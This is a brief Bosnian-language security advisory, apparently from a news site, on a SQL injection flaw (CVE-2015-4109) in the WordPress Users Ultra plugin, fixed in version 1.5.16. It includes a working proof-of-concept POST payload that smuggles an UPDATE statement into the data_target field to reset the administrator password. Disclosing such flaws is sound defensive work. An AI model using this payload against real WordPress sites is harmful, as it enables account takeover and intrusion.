WordPress Users Ultra Plugin SQL Injection ranjivost

WordPress Users Ultra Plugin SQL Injection ranjivost

POST parametri data_target  i data_vote akcije wp_ajax_noprov_rating_vote mogu biti iskorišteni za SQL Injection napad. Navedeni proof of concept mjenja admin password u 1 i omogućava napadaču pristup sistemu : 

* Slanje post requesta na`http://ranjivi.website.com/wp-admin/admin-ajax.php` sa : action=rating_vote&data_id=1
&data_target=user_id IN (1); UPDATE wp_users set user_pass=MD5(1)  where ID &data_vote=1
* Omogućen pristup administratorskim korisničkim imenom i passwordom 1.

POC pretpostavlja prefiks tabele i ID admina. Verzija 1.5.16 otkonila je ovu ranjivost.

Izvor:https://twitter.com/panVagenas

Značaj ranjivosti:HITNO

Platforma:BSD UNIX

CVE oznaka:CVE-2015-4109

Leave a Reply